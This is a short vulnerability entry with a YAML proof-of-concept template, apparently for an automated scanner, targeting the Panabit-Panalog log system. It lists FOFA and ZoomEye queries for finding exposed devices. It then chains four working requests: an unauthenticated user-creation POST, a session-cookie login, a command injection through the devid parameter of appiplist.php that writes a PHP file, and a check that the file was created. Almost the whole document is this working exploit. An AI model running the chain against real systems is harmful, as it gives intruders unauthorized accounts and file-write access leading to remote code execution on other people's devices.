漏洞描述
FOFA: app="Panabit-Panalog"
ZoomEye: app:"Panabit-Panalog"
panabit-applist-rce: Panabit-Panalog log system applist.php command execution
PoC代码[已公开]
id: panabit-applist-rce
info:
name: Panabit-Panalog log system applist.php command execution
author: zan8in
severity: critical
verified: true
description: |-
FOFA: app="Panabit-Panalog"
ZoomEye: app:"Panabit-Panalog"
tags: panabit,rce
created: 2023/10/30
set:
randInt: randomInt(10000, 99999)
randName: randomLowercase(6)
randBody: randomLowercase(56)
rules:
r0:
request:
method: POST
path: /singleuser_action.php
headers:
Content-Type: application/json
body: |
{"syncInfo": { "user": { "userId": "{{randInt}}", "userName": "{{randName}}", "employeeId": "119", "departmentId": "119", "departmentName": "119", "coporationId": "119", "corporationName": "119", "userSex": "1", "userDuty": "119", "userBirthday": "119", "userPost": "119", "userPostCode": "119", "userAlias": "119", "userRank": "119", "userPhone": "119", "userHomeAddress": "119", "userMobilePhone": "119", "userMailAddress": "119", "userMSN": "119", "userNt": "119", "userCA": "119", "userPwd": "119", "userClass": "119", "parentId": "119", "bxlx": "119" },"operationType": "ADD_USER" } }
expression: |
response.status == 200 &&
response.body.bcontains(b"{\"yn\":\"yes\",\"str\":\"OK\"}")
r1:
request:
method: GET
path: /singlelogin.php?userId={{randInt}}
expression: response.status == 302 && response.headers["set-cookie"].icontains("PHPSESSID=")
output:
search: '"PHPSESSID=(?P<phpsessid>.*?);".bsubmatch(response.raw_header)'
phpsessid: search["phpsessid"]
search1: '"Set-Cookie: (?P<cookie>.+)".bsubmatch(response.raw_header)'
cookie: search1["cookie"]
r2:
request:
method: GET
path: "/App/appiplist.php?devid=;echo\"{{randBody}}\">{{randName}}.php;"
headers:
Cookie: "{{cookie}}"
expression: response.status == 200
r3:
request:
method: GET
path: /App/{{randName}}.php
headers:
Cookie: PHPSESSID={{phpsessid}}
expression: response.status == 200 && response.body.bcontains(bytes(randBody))
expression: r0() && r1() && r2() && r3()